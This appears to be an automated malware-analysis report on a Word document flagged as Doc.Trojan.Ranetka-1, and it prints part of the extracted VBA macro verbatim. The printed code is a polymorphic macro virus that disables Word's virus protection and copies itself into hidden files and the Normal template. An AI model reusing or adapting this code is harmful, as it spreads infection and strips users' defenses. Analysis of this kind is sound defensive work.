MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
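The sample contains VBA macros, which are a common method for delivering malware. The macro code attempts to create a file named 'treinfo.___' in the 'c:\windows' directory or, if that directory does not exist, in the root of C:\. The ClamAV detection 'Doc.Trojan.Ranetka-1' strongly suggests this is a known malware family, likely a downloader or dropper. Note that the visible part of the preview shows no download or execution of a second-stage payload. In Document_Close the macro turns off Word's macro-virus protection and its conversion and save prompts (Options.VirusProtection = 0), disables the cancel key, and writes its own code module line by line into 'treinfo.___' with randomly generated junk string assignments inserted between lines. It then sets the hidden and system attributes on 'c:\treinfo.___' and checks whether the Normal template or the active document already starts with 'Private Sub Document_Close()'. That pattern is more consistent with a self-replicating, polymorphic macro virus that targets the Normal template (compare ATT&CK T1137.001 and T1562.001). The preview is truncated before the step that would confirm this, so treat the classification as provisional.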
Heuristics 2
- ClamAV: Doc.Trojan.Ranetka-1 (severity: critical, rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Ranetka-1
- VBA macros detected (severity: medium, rule: OLE_VBA_MACROS). Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18509 bytes |

SHA-256: 6954df133e71b04591f3b5bbf02782a207cba645d804f8dadc2410364aed9200
Detection
ClamAV: Doc.Trojan.Ranetka-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
U$ = "LT1IIIYeSM>[j2veUj;roKluue;v1OTnrKB8`ZIn]PgxW2Cl1hdlFF9[:dS91jJN_h<6\;KVJv96Lu7]fMV@\xVFLkejmu"
On Error Resume Next
surp = ActiveDocument.Saved
T$ = ":;aS;?V:jfqKFiA636s^5KC<qp>J\4j@BeIDF;Qt\f[:H`eEOvGH8hU;foYCoLZ`YrRv2]8kNwnUoF;"
Application.EnableCancelKey = Not -1
S$ = "?_xT8`2JcdfpUQBM4^JElB:BFwcf`eDkD\\8j4Q:CAQi]]@1Ms`4aBRQBT6f9tg8A;dVG>vq=uu]=ceLm<B:m[vLC3[az=F"
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
M$ = "Ux@0lkm@Iy:rb<HLG8=5dkh^Nr=WWHblT@z;rzr2lk1H>8w4Ya^KxZfpCcf3NGl;J3C7ms4l`iac<x8Pr?LxXcqm=WLWcJ"
Randomize Timer
If Dir("c:\windows", vbDirectory) <> "" Then
If Dir("c:\windows\treinfo.___", 6) = "" Then Open "c:\windows\treinfo.___" For Output As #1
Else
R$ = "UmS6Ccf2T1u5eV7uGRJ3Z?jxDfTFJ\pWn1FL3HrK4XZTRJPD>;H3nU]Q5fI>GqV4ficANRjfkm>@UV5263uLM=Uw"
N$ = "hW98Xxg]::]8ZE3RpbFbSAah2Qfa@T5Y5\xKJjXXH]7"
D$ = "6Pr>eVqgcvlT9rXqRYe1Avcw4i]Hrbl8\eWg_1cR;d8o>@tbB`700UQQJ^gmdP4uOIQc`SnKG_<CKTeRK1rv:@wup7CPL"
R$ = "nEs_JPclOYSA:ktbasj"
If Dir("c:\treinfo.___", 6) = "" Then Open "c:\treinfo.___" For Output As #1
End If
I$ = "p^7JarQx5;VS_VTa1pB?ArHiIF:R=KOJTduV?BN18XiPZCZObwc_X8HorH8Krud_AcI>PnsdPH6TRLj"
For iris = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
alco = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(iris, 1)
Y$ = "xg>kY>ZiZgQn\=j7>O:zqVgqMhto@CdpKZhyKaT5X8QUWZzG4T:Trze]@@i\3\?m5d_R[;\2nhoAV685S3o7mwW5"
F$ = "zI5FAjVoDqq5tB7f=xcoI?4oOxs3kB;I4Em=>@MgumBPRcRVBUo:>ZAS1hpBwSGI\4NnzGU?;K4cZfF7>aJaWcNL4SFE"
If iris Mod 2 = 0 And Rnd < 0.3 And alco <> "End Sub" And alco <> "" Then
bukva = CInt((90 - 65) * Rnd) + 65
kol_vo = CInt((100 - 1) * Rnd) + 1
Print #1, Chr$(bukva) + "$=" + Chr$(34);
I$ = "8>_@p=7fonYN1;"
T$ = "]Y_pBY>iy7PcZ]MX2W5ReFSN`U9utL]GWWUoLkXSWXwWg5;q?IYB]smiH:=m2`5;K2471hwFyTAN3K_CZq78UeoHcyo7"
For opa = 1 To kol_vo
V$ = "vAL`d<JhUV<pj9@Jae8vGh"
znak = CInt((122 - 48) * Rnd) + 48
C$ = "ydtGN676XZ;\<QYZvA1sz==h_qSsLIDDB5EkB_>T:EXjRur5mL>[LfNO\7RuE^IAq\R6ttKvoq[Gy1hEoL5M^wnevNT:uv"
Print #1, Chr$(znak);
Q$ = "OfA_:?H;XRKp<XY?[BmXR8okp]ZFbZgiPvriIdM?W4t:Vu1v5_5Y;nL8?g]"
Next opa
T$ = "6;];vkCk^@rOIY`38Ytdr@=Kkwn7kfUKPaNkyg9viqXYc9yo8BkArPr:gKp@lQ3dTF63T]Wi=4tg<]nN;6UUtmIw"
T$ = "rPlngfZqvN1L96[<_Fx:"
F$ = "cLqI2xVN;k^YTdR]oACQvLfRtjpADwuX2rhU8r"
Print #1, Chr$(34)
Print #1, alco
Y$ = "tjTcUV8_ZuAJMlps]gUqE;Cx:NEm6IL5yvreaGrc<nT`FbX7LOWbC9akZOGNC3`8JSTRw"
Else
Print #1, alco
B$ = "kbs7X<[sq4ShuCsX]Sp6vk9tt_VFLm[P<3J5cQP=YYI2UL5QbovE3MaB4tapbo`jY]SCR=?vx5OsWMlpSF2"
E$ = ":FJ5sJJm^Zn<R"
J$ = "^RYoo;_Qo:r<QFoEPXkajAeE:m@1Nm1_pjK6Bm2x?A@N6G4tl\2"
End If
Next iris
F$ = "V2Lj`T_OiJ`je_hv;qZ5Hvrm5qou5=DwMAGRAyNAvxJxFPc4ylO\QQkoiWZc5ICXw]sMEIt8=`<7J4P1Xq6xFyng4c2"
Close #1
SetAttr "c:\treinfo.___", 6
N$ = "`90rKVVZyzGe85vXh3XPD=OEY3qxX?G;o6W@i8EaT7?URtg7@I`9AAMq=r9lKga?O=qDCdC"
X$ = "\kH\`YXbS;lp4;iMYdChBVUImzU>xkb9zRg"
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
O$ = "6:?"
Set times = NormalTemplate.VBProject.VBComponents.Item(1)
P$ = "YrOKMK;uce_4gYLLNs[FHN]iOk_MfYSfLtkrm1PLNN899cCp[X@bJqZnNDnrwhGxMaCN[sCSPNp[[kUWPK[7"
D$ = "fHutdWDJEOrhTl1mIOxi>wCWKI^8rC\@`s=Abyh@e2KQ9o"
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set times = ActiveDocument.VBProject.VBComponents.Item(1)
I$ = "J@@aLcLdvE3]jEb2n"
Y$ = "f2RJX8rA]282@PMpk_>[aDp31CxfB3XXNwku140<4u\vB1_AXzJEsV;4J:`e=X9URx:jtxOOjD3F@4g>cMannv:"
Else
L$ = "W43k6Siwoea[H\QG5cII=8:5tFW@hAd2Ug>kkAoblV"
E$ = "3fv`qooG1H:dOh=f5g]\FudV=\2pNCFVBa]Jlyc:^G"
times = ""
V$ = "8aPC7`xS>EUf7mOdG1Sqs3=_McFNv`gDtB`dSF`ZZ@UM"
End If
Y$ = "?E>13s>bM5DtMA_XaCAxyc0b3CKhY]os[M8R8T8qoUYHMY_ZPHv<PBbjO58r2`"
W$ =
... (truncated)